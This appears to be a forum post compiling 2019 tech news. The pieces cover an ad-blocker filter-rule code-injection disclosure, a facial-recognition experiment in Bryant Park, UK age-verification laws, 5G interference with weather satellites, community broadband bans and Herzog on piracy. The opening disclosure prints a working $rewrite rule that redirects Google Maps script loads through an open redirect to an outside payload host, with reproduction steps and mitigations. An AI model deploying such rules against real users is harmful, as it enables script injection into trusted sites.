Considering the nature and implications of the uncovered vulnerabilities, and given that filter lists have been employed in the past for politically motivated attacks, details of the exploit chain are publicly disclosed to ensure the fastest possible propagation of upcoming mitigations in the affected browser extensions and web services.

Attack

The $rewrite filter option is used by some ad blockers to remove tracking data and block ads by redirecting requests. The option allows rewrites only within the same origin, and requests of SCRIPT, SUBDOCUMENT, OBJECT and OBJECT_SUBREQUEST types are not processed.

However, web services can be exploited with the help of this filter option when they use XMLHttpRequest or Fetch to download code snippets for execution, while allowing requests to arbitrary origins and hosting a server-side open redirect.

Extensions periodically update filters at intervals determined by filter list operators. Attacks are difficult to detect because the operator may set a short expiration time for the malicious filter list, which is then replaced with a benign one. Organizations and individuals may be targeted based on the IP addresses from which the updates are requested.

The following criteria must be met for a web service to be exploitable using this method:

1. The page must load a JS string using XMLHttpRequest or Fetch and execute the returned code
2. The page must not restrict origins from which it can fetch using Content Security Policy directives, or it must not validate the final request URL before executing the downloaded code
3. The origin of the fetched code must have a server-side open redirect or it must host arbitrary user content

Filter list operators may deliver a rule update such as this:

Code:
/^https://www.google.com/maps/_/js/k=.*/m=pw/.*/rs=.*/$rewrite=/search?hl=en-US&source=hp&biw=&bih=&q=majestic-ramsons.herokuapp.com&btnI=I%27m+Feeling+Lucky&gbv=1
The above rule redirects the target request to Google’s I’m Feeling Lucky search service, which then redirects to a page with the payload: alert(document.domain).

Steps for running arbitrary code on Google Maps:

1. Install either Adblock Plus, AdBlock or uBlock in a new browser profile
2. Visit the options of the extension and add the example filter list, this step is meant to simulate a malicious update to a default filter list
3. Navigate to Google Maps
4. An alert with “www.google.com” should pop up after a couple of seconds

Gmail and Google Images also meet the listed conditions to be exploitable.

Google has been notified about the exploit, but the report was closed as “Intended Behavior”, since they consider the potential security issue to be present solely in the mentioned browser extensions. This is an unfortunate conclusion, because the exploit is composed of a set of browser extension and web service vulnerabilities that have been chained together.

Please note that the vulnerability is not limited to Google services, other web services could be affected as well.

Mitigation

The exploit can be mitigated in the affected web services by whitelisting known origins using the connect-src CSP header, or by eliminating server-side open redirects.

Ad blocking extensions should consider dropping support for the $rewrite filter option. It’s always possible to abuse the feature to some degree, even if only images or style sheets are allowed to be redirected.

Users may also switch to uBlock Origin. It does not support the $rewrite filter option and it is not vulnerable to the described attack.
https://armin.dev/blog/2019/04/adblo...ode-injection/





We Built a (Legal) Facial Recognition Machine for $60
Sahil Chinoy

Most people pass through some type of public space in their daily routine — sidewalks, roads, train stations. Thousands walk through Bryant Park every day. But we generally think that a detailed log of our location, and a list of the people we’re with, is private. Facial recognition, applied to the web of cameras that already exists in most cities, is a threat to that privacy.

To demonstrate how easy it is to track people without their knowledge, we collected public images of people who worked near Bryant Park (available on their employers’ websites, for the most part) and ran one day of footage through Amazon’s commercial facial recognition service. Our system detected 2,750 faces from a nine-hour period (not necessarily unique people, since a person could be captured in multiple frames). It returned several possible identifications, including one frame matched to a head shot of Richard Madonna, a professor at the SUNY College of Optometry, with an 89 percent similarity score. The total cost: about $60.

“My first reaction was, ‘Oh my god, that is unbelievable,’” Dr. Madonna said, after we reached him and explained the experiment. “I was shocked at how readily it seems that it picked me up, because, really — it’s the side of my head.”

In our exercise, we built a database using only photos from public websites, and we obtained Dr. Madonna’s consent before publishing this story. We’ve deleted the images and data that we collected and are no longer monitoring the Bryant Park cameras.

Over decades, businesses and individuals have installed millions of cameras like the ones we used, inadvertently setting up the infrastructure for mass surveillance. In the past, a human would have to watch the video feed to identify people, making it impossible to comprehensively record everyone’s movements. But the accuracy and speed of modern facial recognition technology means that building a dragnet surveillance system is now feasible.

The law has not caught up. In the United States, the use of facial recognition is almost wholly unregulated.

“The technology has advanced faster than even I thought that it would,” said Jennifer Lynch, surveillance litigation director at the Electronic Frontier Foundation. She said that because of how quickly the technology has advanced, she would now support a wholesale ban on government use of facial recognition.

The cameras in Bryant Park were installed more than a decade ago so that people could see whether the lawn was open for sunbathing, for example, or check how busy the ice skating rink was in the winter. They are not intended to be a security device, according to the corporation that runs the park.

But our experiment shows that a person equipped with just a few cameras and facial recognition technology can learn people’s daily habits: when they arrive at the office each day, who they get coffee with, whether they left work early. When we identified Dr. Madonna, he was on his way to lunch with a job candidate — an example of how the midday outings of even law-abiding citizens can sometimes be sensitive information.

The police and governments may also have access to a vast network of cameras. Combine that with a comprehensive database of faces — like a driver’s license database — and it’s possible to track citizens throughout an entire region in real time. There is no evidence that this is happening on a wide scale in the United States. But that’s not because the technology doesn’t exist. Last year, companies claimed they could compare live feeds to a database of billions of faces.

Authorities have used facial recognition to track down criminal suspects and find missing children. But civil liberties advocates warn about the chilling effect on free speech if the government could monitor everyone’s whereabouts — or, say, identify individuals at a protest. This is not a purely hypothetical concern: During 2016 protests after Freddie Gray died in the custody of Baltimore police, law enforcement used facial recognition on social media images to identify protesters with outstanding warrants.

"Once the government has the ability to track us and identify us wherever we go, it is impossible to speak and participate in society anonymously," Ms. Lynch said.

Facial recognition in New York City

New York City is nowhere near China, where the government has installed approximately one surveillance camera for every seven citizens. But according to the A.C.L.U., police here have access to more than 9,000 camera feeds in Lower Manhattan alone.

The M.T.A. has tried using facial recognition on feeds from license-plate cameras at the city’s entry points to identify drivers through their windshields, although those efforts have been unsuccessful so far, according to The Wall Street Journal. And the Department of Transportation already has hundreds of cameras across New York City used to monitor traffic, feeds that are also streamed publicly online.

The traffic cameras are most likely too low-resolution for effective facial recognition. But the city’s LinkNYC kiosks, which are scattered through the streets and intended to provide free wireless internet, each have two security cameras. Law enforcement agencies need a subpoena or court order to gain access to the footage, and using facial recognition is against the policy of the company that owns the kiosks. However, the existence of more than 3,000 additional cameras has raised concerns about their potential to bolster the city’s surveillance capabilities.

Details are sparse, but there is evidence that those capabilities are formidable. The Police Department claims its Domain Awareness System, developed jointly with Microsoft (which also offers facial recognition software), “utilizes the largest network of cameras, license plate readers, and radiological sensors in the world.”

It’s unclear whether the Domain Awareness System currently uses facial recognition, though the Police Department experimented with it in 2012, according to Clare Garvie, an associate at the Center on Privacy and Technology at Georgetown Law School. The police have been reluctant to divulge details, and the center has sued the department for more information.

“We compare facial images picked up by cameras at crime scenes to mugshots in law enforcement records,” said Sgt. Jessica McRorie, a spokeswoman for the department, in an emailed statement. “We do not engage in mass or random collection of facial records from N.Y.P.D. camera systems, the internet, or social media.”

Law enforcement use of the technology

Amazon is one of several companies, including Google and Microsoft, that sell facial recognition services to the public. The company has highlighted positive applications of the service we used, Rekognition, such as its ability to help find lost children. It insists that it requires customers comply with the law and respect others’ rights, but has been criticized for pushing its technology to law enforcement agencies.

Rekognition is already actively used by the sheriff’s office in Washington County, Ore., including to investigate minor crimes like shoplifting. The Orlando, Fla., Police Department is also using the technology in a pilot program.

Amazon notes that its service makes predictions, not decisions, and that the confidence level the service provides should be incorporated in a human review process. The company recommends using a threshold of at least 99 percent for applications of its facial recognition service that involve identification or public safety, though critics of the technology say that the scoring is opaque and that the company has no way of enforcing that threshold. None of the matches we obtained from the Bryant Park footage, correct or incorrect, met the threshold.

Matt Wood, the general manager of artificial intelligence for Amazon Web Services, noted that it is possible that Rekognition, like other types of information available to law enforcement officials, could be used inappropriately. “The law enforcement agency will have to be accountable to these individuals and to the law if they violate people’s civil liberties,” he said. He added that the company has not received any reports of misuse by law enforcement.

In January, however, the A.C.L.U. sent a letter to Amazon asking it to stop selling facial recognition technology to police and government agencies, saying that the company’s attention to civil liberties has lagged behind that of Google and Microsoft.

“Rekognition marketing materials read like a user manual for authoritarian surveillance,” said Nicole Ozer, the technology and civil liberties director for the A.C.L.U. of California, in a statement last year.

Regulate or ban?

In the United States, there are no federal laws that restrict the use of facial recognition. Most states don’t have regulations, nor does New York City, though a city councilman proposed legislation last year that would require businesses to disclose their use of the technology. That would apply to our exercise, but would not extend to law enforcement’s use of facial recognition.

“It’s kind of like a wild, wild west out there,” Ms. Lynch, the E.F.F. lawyer, said.

The lack of regulation has opened the door to a wide range of applications. In 2007, an Arizona sheriff’s office enrolled all of Honduras’s driver’s licenses and mugshots into its database, and a Florida sheriff’s office runs 8,000 searches each month without requiring its officers to have reasonable suspicion of a crime, according to the Georgetown report.

The Georgetown center along with the E.F.F. and others have proposed regulations, including requiring that authorities have reasonable suspicion before conducting a search; prohibiting, except in life-or-death situations, live facial recognition searches using driver’s license databases; and forbidding tracking individuals based on political beliefs, race or religion.

Amazon itself has called for a legal framework that incorporates human review and transparency. But some say that the technology is so dangerous that no regulation is sufficient.

“The future of human flourishing depends upon facial recognition technology being banned,” wrote Woodrow Hartzog, a professor of law and computer science at Northwestern, and Evan Selinger, a professor of philosophy at R.I.T., last year. “Otherwise, people won’t know what it’s like to be in public without being automatically identified, profiled, and potentially exploited.”

Facial recognition is categorically different from other forms of surveillance, Mr. Hartzog said, and uniquely dangerous. Faces are hard to hide and can be observed from far away, unlike a fingerprint. Name and face databases of law-abiding citizens, like driver’s license records, already exist. And for the most part, facial recognition surveillance can be set up using cameras already on the streets.

It might be too late for a moratorium or ban, however. Facial recognition is already being used by police departments around the country, Ms. Garvie said.

“We can’t lock law enforcement agencies into 20th-century technology just because 21st-century technology raises very serious risks,” she said.

Dr. Madonna, the person we identified, said he understood that tension. He was initially astonished when we reached out to him, but he said that as a doctor, he often talks to students about the ratio of risk to benefit. He saw the tremendous benefits that facial recognition could offer, he said.

But the technology is open to abuse, he added, when individuals or governments can use facial recognition to track any group, or just about any ordinary citizen — even someone walking through Bryant Park.
https://www.nytimes.com/interactive/...york-city.html





Online Pornography Age Checks to be Mandatory in UK from 15 July

Sites that fail to verify users are over 18 face being blocked under controversial laws
Alex Hern

The UK’s age verification system for online pornography will become mandatory on 15 July, the government has confirmed.

From that date, commercial providers of online pornography will be required to carry out “robust” age verification checks on users, in order to keep children from accessing adult content.

Websites that refuse to implement the checks face being blocked by UK internet service providers or having their access to payment services withdrawn.

The digital minister, Margot James, welcomed the introduction of the rules, saying: “Adult content is currently far too easy for children to access online. The introduction of mandatory age verification is a world first, and we’ve taken the time to balance privacy concerns with the need to protect children from inappropriate content. We want the UK to be the safest place in the world to be online, and these new laws will help us achieve this.”

Will Gardner, the chief executive of Childnet, said: “We hope that the introduction of this age verification will help in protecting children, making it harder for young people to accidentally come across online pornography, as well as bringing in the same protections that we use offline to protect children from age-restricted goods or services.”

Some campaigners have criticised the laws’ potential effectiveness. The government was forced to exempt large social media sites from the ban owing to fears that a strict implementation would result in sites including Twitter, Reddit, Imgur and Tumblr being blocked for adult content.

Additionally, concerns have been raised that the laws could result in the creation of a database of the UK’s porn viewers, which would pose a privacy problem if it were to ever leak.

Unfortunately for the government’s attempts to calm fears on the privacy issue, the news was announced by the Department for Digital, Culture, Media, and Sport in an email that exposed the contact details of almost 300 recipients. DCMS was also responsible for implementing the new GDPR laws in the UK, which mandate large financial penalties for breaches that expose personal data.

Jim Killock, the executive director of the Open Rights Group, said: “The government needs to compel companies to enforce privacy standards. The idea that they are ‘optional’ is dangerous and irresponsible. Having some age verification that is good and other systems that are bad is unfair and a scammer’s paradise – of the government’s own making.”

He added: “Data leaks could be disastrous, and they will be the government’s own fault. The government needs to shape up and legislate for privacy before their own policy results in people being outed, careers destroyed or suicides being provoked.”
https://www.theguardian.com/technolo...k-from-15-july





Porn Sites Offer Loopholes to Get Around Web Ban As BBFC Admits it is Powerless to Stop Tech Savvy Teens

Porn websites are highlighting loopholes in the ban on under-18s accessing them
Charles Hymas, Mike Wright

Porn websites are highlighting loopholes in the ban on under-18s accessing them, as the watchdog admitted it will be powerless to stop tech-savvy teenagers circumventing it.

The regulator acknowledged virtual private networks (VPNs) will allow users to evade age verification checks from July 15 by allowing under-aged users to create ghost accounts abroad that can access the porn sites.

Although most VPNs require payment, MindGeek, the firm behind some of the world’s largest porn sites, has already released its own free VPN service, VPNHub, which allows users to disguise their location.

Last year it advertised the service with the claim that it would let the user “access all websites and apps securely and privately at home, school, work or from anywhere in the world.”

That description has now been changed, but on Apple’s App Store, VPN Hub boasts it will “mask your true location by routing your data through our full stack of global encrypted servers”.

The app is currently available on Google and Apple app stores although MindGeek claimed it would not be available in UK app stores without age verification once the ban came into effect.

Asked about the prospect of children using VPNs, the British Board of Film Classification (BBFC), the regulator, admitted age-verification is "not a silver bullet."

A spokesman added: “Determined teenagers will find ways to access pornography. However, it will mean young children can no longer stumble across porn on commercial pornographic websites.”

Experts also warned that anyone using VPNs risked exploitation of their personal data as controls on privacy and commercial use tended to be more lax.

The Government estimates 1.4 million children a month access porn sites. From July 15, anyone who visits a porn site from a British IP address will be asked for “proof” they are 18, which they can obtain from third-party age verification firms or cards that can be bought in shops for £4.99.

Experts anticipate the cards or codes that adults obtain from age verification firms are likely to end up being traded among prospective under-aged users.

The BBFC is to closely monitor messaging and social media sites such as Reddit, Tumblr and Flickr which are not covered by the legislation but provide a potential route for young users to access porn. It will report in a year on whether further legislative action might be needed.

With five million porn sites worldwide, the BBFC admits it will have to concentrate enforcement on the most popular porn sites that refuse to comply with the law, which is likely to leave smaller operations open to savvy younger users.

Jim Killock, executive director of the Open Rights Group, said he was particularly worried about torrent file-sharing sites where people can already download pirate copies of films and porn.

“These are semi-criminal operations that flout the law because they don’t give a hoot. They are breaking the law by sharing content anyway so they are not going to care about age verification,” he said.

Myles Jackman, a lawyer expert on pornography legislation, said: “The community that is supposed to be most protected are the most tech literate and will be able to circumvent these rules."

The BBFC said it would report in a year on the effectiveness of the regime “including highlighting any changes in technology and will recommend additional or alternative means of achieving the child protection goals of the legislation.”
https://www.telegraph.co.uk/news/201...its-powerless/





How 5G is Likely to Put Weather Forecasting at Risk
Dan Maloney

If the great Samuel Clemens were alive today, he might modify the famous meteorological quip often attributed to him to read, “Everyone complains about weather forecasts, but I can’t for the life of me see why!” In his day, weather forecasting was as much guesswork as anything else, reading the clouds and the winds to see what was likely to happen in the next few hours, and being wrong as often as right. Telegraphy and better instrumentation made forecasting more scientific and improved accuracy steadily over the decades, to the point where we now enjoy 10-day forecasts that are at least good for planning purposes and three-day outlooks that are right about 90% of the time.

What made this increase in accuracy possible is supercomputers running sophisticated weather modeling software. But models are only as good as the raw data that they use as input, and increasingly that data comes from on high. A constellation of satellites with extremely sensitive sensors watches the planet, detecting changes in winds and water vapor in near real-time. But if the people tasked with running these systems are to be believed, the quality of that data faces a mortal threat from an unlikely foe: the rollout of 5G cellular networks.

Where’s the Water?

To understand how a new generation of wireless technology can deleteriously impact weather forecasting, it helps to take a look at exactly what powers the weather, and what these satellites are looking at. Our weather is largely the result of differences between air masses. Pressure, temperature, and moisture, each determined by energy inputs from the Sun, all team up in a complex manner to determine where and when clouds will form and which direction the winds will come from. Remotely sensing these differences is the key to accurately forecasting the weather.

The satellites that watch our weather are largely passive sensor platforms that measure the energy reflected or emitted by objects below them. They gather data on temperature and moisture — pressure is still measured chiefly by surface measurements and by radiosondes — by looking at the planet in different wavelengths. Temperature is measured mainly in the optical wavelengths, both visible and infrared, but water vapor is a bit harder to measure. That’s where microwaves come in, and where weather prediction stands to run afoul of the 5G rollout.

Everything on Earth – the plants, the soil, the surface water, and particularly the gases in the atmosphere – both absorb and, to a lesser degree, emit microwave radiation. Measuring those signals from space is the business of satellites carrying microwave radiometers, essentially sensitive radio receivers tuned to microwave frequencies. By looking at the signals received at different wavelengths, and by adding in information about the polarization of the signal, microwave radiometry can tell us what’s going on within a vertical column of the atmosphere.

For water vapor, 23.8-GHz turns out to be very useful, and very much in danger of picking up interference from 5G, which will use frequencies very close to that. Since microwave radiometers are passive receivers, they’ll see pretty much everything that emits microwave signals in that range, like the thousands of cell sites that will be needed to support a full 5G rollout. Losing faint but reliable water vapor signals in a sea of 5G noise is the essential problem facing weather forecasters, and it’s one they’ve faced before.

Real World Consequences

At the 2019 annual meeting of the American Meteorological Society, Sidharth Misra, a research engineer at NASA’s Jet Propulsion Laboratory, presented data showing how commercial enterprises can have unintended consequences on the scientific community. Between 2004 and 2007, satellite-based microwave radiometers detected an increase in noise in a curious arc across the top of the United States. A similar signal was detected by another satellite, with the addition of huge signals being returned from the waters off each coast and the Great Lakes. The signals turned out to be reflections from geosynchronous direct TV satellites, bouncing off the surface and swamping the water vapor signals the weather satellites were trying to measure.

But surely the scientists are overreacting, right? Can losing one piece of data from as complex a puzzle as weather prediction really have that much of an impact? Probably yes. The water vapor data returned by microwave radiometers like the Advanced Microwave Sounding Unit (AMSU) aboard a number of weather satellites is estimated to reduce the error of weather forecasts by 17%, the largest contributor by far among a group of dozens of other modalities.

The loss of microwave water vapor data could have catastrophic real-world consequences. In late October of 2012, as Hurricane Sandy barreled up the East coast of the United States, forecasts showed that the storm would take a late turn to the northwest and make landfall in New Jersey. An analysis of the forecast if the microwave radiometer data had not been available showed the storm continuing in a wide arc and coming ashore in the Gulf of Maine. The availability of ASMU data five days in advance of the storm’s landfall bought civil authorities the time needed to prepare, and probably reduced the casualties caused by the “Storm of the Century”, still the deadliest storm of the 2012 season.

Auction Time

So exactly where are we with this process? The FCC auction of licenses for the Upper Microwave Flexible Use Service (UMFUS), which offers almost 3000 licenses in the 24-GHz band, began on March 14, 2019, despite a letter from NASA Administrator Jim Bridenstine and Secretary of Commerce Wilbur Ross requesting that it be delayed. FCC Chairman Ajit Pai rejected the request, stating that there was an “absence of any technical basis for the objection.”

Will the 5G rollout negatively impact weather forecasts? It’s not clear. Licensees are required to limit out-of-band emissions, but with so many 5G sites needed to cover the intended service areas, and with the critical 23.8-GHz water vapor frequency so close to the UMFUS band, there’s not much room for error. And once the 5G cat is out of the bag, it’ll be difficult to protect that crucial slice of the microwave spectrum.

Whatever happens, it doesn’t look good for weather forecasting. The UMFUS auction proceeds apace, and has raised almost $2 billion so far. Companies willing to spend that much on spectrum will certainly do whatever it takes to realize their investment, and in the end, not only will science likely suffer, but lives may be put at risk for the sake of 5G as our toolset for predicting dangerous weather faces this new data-gathering challenge.
https://hackaday.com/2019/04/16/5g-b...sting-at-risk/





Report: 26 States Now Ban or Restrict Community Broadband

Many of the laws restricting local voters’ rights were directly written by a telecom sector terrified of real broadband competition.
Karl Bode

A new report has found that 26 states now either restrict or outright prohibit towns and cities from building their own broadband networks. Quite often the laws are directly written by the telecom sector, and in some instances ban towns and cities from building their own broadband networks—even if the local ISP refuses to provide service.

The full report by BroadbandNow, a consumer-focused company that tracks US broadband availability, indicates the total number of state restrictions on community broadband has jumped from 20 such restrictions since the group’s last report in 2018.

Frustrated by slow speeds, limited availability, high prices and terrible customer service, more than 750 communities across the country have built their own broadband ISPs or cooperatives. Studies have shown these locally owned and operated networks tend to offer lower prices, faster speeds, and better customer service than their private-sector counterparts.

Instead of competing by offering better service—private sector telecom giants like Comcast and AT&T have routinely turned to a cheaper alternative: easily corrupted state lawmakers. In exchange for campaign contributions, lawmakers frequently and uncritically pass on model legislation written by industry and distributed by organizations like ALEC.

Often the restrictions are buried in other, unrelated legislation to try and avoid public scrutiny. For example in 2016, AT&T lobbyists attempted to include community broadband restrictions in a bill intended to address regional traffic issues.

BroadbandNow’s report looks at each state’s restrictions individually, and found that while some states simply banned community broadband outright (a notable assault on voters’ democratic rights), others impose clever but onerous restrictions on precisely how a local network can be funded, who they can partner with, or how quickly (and where) they’re allowed to grow.

In Tennessee, for example, state laws allow publicly-owned electric utilities to provide broadband, “but limits that service provision to within their electric service areas.” Such restrictions have made it hard for EPB—the highest rated ISP in America last year according to Consumer Reports—to expand service into new areas.

“During the 2017 legislative session, a bill considered by state lawmakers would have enabled municipalities to expand broadband infrastructure to residents,” the report notes. “Instead, lawmakers passed a bill that offers $45 million in subsidies to private Internet service providers to build the same infrastructure.”

The problem: throwing taxpayer subsidies at private ISPs often doesn't fix the problem. A recent study by the Institute For Local Self-Reliance (ILSR) found that a combination of terrible broadband maps, local and federal corruption, and regulatory apathy often means funds are doled out to companies that not only fail to follow through with deployment, but face no meaningful government repercussions for not doing so.

Community broadband isn’t a magical panacea, and like any effort it depends on the viability of the underlying business model. But such efforts can often motivate private ISPs to improve local prices and service, as Comcast was forced to do in Tennessee.

“In a time when communities need as much investment as possible to build strong economies, these states are more focused on protecting the monopolies that are investing too little,” ISLR’s Christopher Mitchell told Motherboard in an email. “Many of these states are actually using taxpayer dollars to subsidize privately owned networks when they will not let local taxpayers decide to build their own network—which is often done at no cost to the taxpayer!”

Mitchell said his own organization pegs the total number of hard state-level restrictions at around 20 states, and argued the state-level restrictions serve no valid purpose outside of protecting natural telecom monopoly revenues from democratic disruption.

“There is no legitimate justification to limit local authority to build essential infrastructure,” Mitchell said. “Even where a community is supposedly well-served by a cable monopoly, [the local community-run ISP is] the most knowledgeable and where additional investment is needed.”

You’d be hard pressed to find many consumers who believe that a Comcast-written law should supplant their local voting rights as it pertains to local infrastructure, even if they don’t agree that their town or city should pursue the option. But ISP lobbyists and lawmakers have grown adept over the years at obscuring such efforts from public scrutiny.

“Unfortunately, despite how unpopular these restrictions are with certain community members, they remain very under-the-radar to the public at large,” Tyler Cooper, consumer policy expert and editor at BroadbandNow, told Motherboard.

Cooper noted that the only way to thwart such efforts is for consumers to pay closer attention and get involved with politics at a “hyper local level.”

“Community members can get engaged with the regulatory process in their home state, telling their representatives that they want municipal broadband to be available to as many residents as possible,” Cooper said. “Showing up in groups to town hall meetings can really move the needle. Many of the anti-muni laws can be overcome if enough community support is present,” he said.
https://motherboard.vice.com/en_us/a...nity-broadband





Werner Herzog Says If You Can’t Find His Films Legally, Go Ahead And Pirate Them
Matt Prigge

Werner Herzog has led a charmed life, from frequently avoiding death while making his singular films to getting semi-randomly cast in popcorn fare like Jack Reacher (as the villain!) to continuing an interview after being shot in the belly by a stray BB gun. Also remember that time he popped up on Parks and Recreation? So we’ll see what his new bosses at Disney, who allowed him to be cast in the forthcoming Star Wars show The Mandalorian, have to say about his latest bold statement, namely that pirating movies? To him it’s fine.

As per The Independent, the filmmaker/actor/madman — who almost went crazy filming Fitzcarraldo in the Amazon Basin and once rescued Joaquin Phoenix from a car accident — was speaking at the Vision in Nyon film festival in Switzerland when Ukranian producer Illia Gladshtein mentioned she was only able to find his noted films on illegal download sites.

¨Piracy has been the most successful form of distribution worldwide,” Herzog responded. He clarified that he, of course, likes being paid, but if a film of his is not available via proper channels, then, you know, go with God. “If someone like you steals my films through the internet or whatever, fine, you have my blessing.”
https://uproxx.com/movies/werner-her...-distribution/

















Until next week,

- js.



















Current Week In Review





Recent WiRs -

April 13th, April 6th, March 30th, March 23rd

Jack Spratts' Week In Review is published every Friday. Submit letters, articles, press releases, comments, questions etc. in plain text English to jackspratts (at) lycos (dot) com. Submission deadlines are Thursdays @ 1400 UTC. Please include contact info. The right to publish all remarks is reserved.


"The First Amendment rests on the assumption that the widest possible dissemination of information from diverse and antagonistic sources is essential to the welfare of the public."
- Hugo Black
__________________
Thanks For Sharing
JackSpratts is offline   Reply With Quote
Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Peer-To-Peer News - The Week In Review - July 16th, '11 JackSpratts Peer to Peer 0 13-07-11 06:43 AM
Peer-To-Peer News - The Week In Review - July 9th, '11 JackSpratts Peer to Peer 0 06-07-11 05:36 AM
Peer-To-Peer News - The Week In Review - January 30th, '10 JackSpratts Peer to Peer 0 27-01-10 07:49 AM
Peer-To-Peer News - The Week In Review - January 16th, '10 JackSpratts Peer to Peer 0 13-01-10 09:02 AM
Peer-To-Peer News - The Week In Review - December 5th, '09 JackSpratts Peer to Peer 0 02-12-09 08:32 AM






All times are GMT -6. The time now is 02:11 PM.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
© www.p2p-zone.com - Napsterites - 2000 - 2024 (Contact grm1@iinet.net.au for all admin enquiries)